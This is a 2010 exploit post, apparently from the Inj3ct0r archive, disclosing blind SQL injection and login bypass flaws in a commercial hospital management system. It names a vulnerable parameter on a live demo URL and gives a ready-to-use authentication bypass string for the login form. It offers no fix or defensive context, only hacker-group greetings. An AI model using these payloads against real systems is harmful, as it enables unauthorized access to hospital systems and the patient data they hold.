Home / os / win7

Pre Hospital Management System BSql injection/Auth Bypass Vu

Posted on 06 July 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Pre Hospital Management System BSql injection/Auth Bypass Vulnerabilty</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>======================================================================
Pre Hospital Management System BSql injection/Auth Bypass Vulnerabilty
======================================================================


Name : Pre Hospital Management System? Sqli / Aauth Bypass Vulnerability
Critical Level :VERY HIGH
vendor URL :http://www.hostnomi.net
Price:$750

Author : ..::[ SONiC ]::.. aka ~the_pshyco~ &lt;sonicdefence[at]gmail.com&gt;

special thanks to : Sid3^effects,r0073r (inj3ct0r.com),L0rd CruSad3r,M4n0j,Bunny,Nishi,MA1201,RJ,D3aD F0x

greetz to :www.topsecure.net ,All ICW members , iNj3cT0r.com, www.andhrahackers.com

special Shoutz : my Girl Frnd [H*****]

#######################################################################################################
Description :

Pre Hospital Management System System is powerful, flexible, and easy to use and is designed and developed to deliver real conceivable benefits to hospitals and clinics. Pre Online hospital management system.


#######################################################################################################
Xploit :Blind SQli Vulnerability

DEMO URL :http://www.hostnomi.net/hms/department.php?id=[sqli]

###############################################################################################################

Xploit :Auth Bypass Vulnerability

DEMO URL http://www.hostnomi.net/hms/login.php

Use ' or 1=1 or ''=' in username ad password :D
###############################################################################################################
# ..::[ SONiC ]::.. aka the_pshyco
# profile http://inj3ct0r.com/author/2545


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-06]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :